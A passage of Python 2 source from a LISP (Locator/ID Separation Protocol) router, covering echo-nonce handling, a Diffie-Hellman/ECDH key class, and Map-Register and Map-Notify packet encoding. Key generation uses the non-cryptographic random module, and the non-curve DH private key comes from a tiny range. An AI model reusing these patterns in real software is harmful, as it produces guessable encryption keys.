ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
